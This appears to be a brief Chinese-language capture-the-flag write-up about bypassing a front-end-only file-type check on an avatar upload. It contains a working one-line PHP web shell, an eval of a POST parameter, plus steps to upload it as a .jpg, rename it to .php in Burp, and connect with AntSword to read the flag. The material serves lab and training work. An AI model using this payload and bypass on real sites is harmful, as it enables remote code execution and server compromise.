整体思路 注册用户并登录上传头像功能点前端验证 | 绕过:上传shell.jpg,burp抓包,修改后缀为.php 分步演示 1. 注册用户 testetst/123456 2. 登录, 来到编辑上传头像处 3. 上传木马:新建一个txt文件,内容为<?php eval($_POST[1]);?>, 修改后缀为 jpg 4. 上传并Burp抓包 5. 修改后缀为php, 发包 6. 刷新页面,右键点击新标签页中打开图像 7. 验证是否成功解析 8. 使用蚁剑连接,地址为头像路径,密码为1 9. 根目录下找到flag